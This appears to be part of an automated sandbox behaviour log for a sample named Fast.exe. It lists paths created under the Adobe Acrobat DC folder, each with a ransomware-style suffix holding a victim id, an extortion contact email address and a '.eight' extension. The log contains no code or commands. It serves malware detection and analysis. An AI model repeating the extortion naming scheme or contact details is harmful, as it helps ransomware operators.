Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\stopwords.ENU.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Bold.eot.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Light.eot.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Regular.eot.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Bold.woff.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Light.woff.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Regular.woff.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\PDFPrevHndlr.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\PDFSigQFormalRep.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Accessibility.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\adobepdf.xdc.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\AdobePDF417.pmp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\DataMatrix.pmp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\QRCode.pmp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\CompareMarkers.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Pointers.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Faces.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\SignHere.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Standard.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Checkers.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\Words.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\DVA.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\DropboxStorage.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\eBook.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\IA32.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\mip_ClientTelemetry.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\mip_upe_sdk.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\MSRMS.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\Flash.mpp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\MCIMPP.mpp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\WindowsMedia.mpp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\PDDom.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\ReadOutLoud.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\reflow.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\SaveAsRTF.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\SendMail.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Search.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Spelling.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\StorageConnectors.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Updater.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\weblink.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\2d.x3d.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\3difr.x3d.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\drvDX9.x3d.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\drvSOFT.x3d.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\MyriadCAD.otf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\tesselate.x3d.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\pmd.cer.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\Microsoft.VCLibs.x86.14.00.appx.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Accessibility_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Actions_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\AppCenter_R.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\CCX_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Certificates_R.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\CollectSignatures.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Combine_DelayedPaywall.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Combine_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Comments.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Compare_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\ConvertPDF_Full.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\ConvertPDF_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\CPDF_Full.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\CPDF_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\CreateCustom_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Developer_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Edit_DelayedPaywall.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Edit_R_Exp_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Edit_R_Full.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Edit_R_Menu.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Edit_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\EPDF_Full.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\EPDF_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Forms_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Home.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\FillSign.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\InAppSign.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Index_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Measure.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\MoreTools.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\OptimizePDF_R_CTX.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\OptimizePDF_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Pages_DelayedPaywall.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Pages_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\PrintProduction_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Protect_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Redact_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Review_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\RichMedia_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Scan_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Stamp.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Standards_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\TrackedSend.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\UnifiedShare.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Viewer.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ScCore.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RTC.der.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\Action01.sequ.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\Action02.sequ.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\Action03.sequ.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\Action04.sequ.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\Action05.sequ.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\Action06.sequ.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\sqlite.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\add_reviewer.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\bl.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\br.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\create_form.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\change_deadline.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\distribute_form.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\email_all.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\email_recipients_not_respond.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\email_initiator.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\ended_review_or_form.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\end_review.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\forms_distributed.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\forms_received.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\forms_super.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
Source: C:\Users\user\Desktop\Fast.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\form_responses.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight
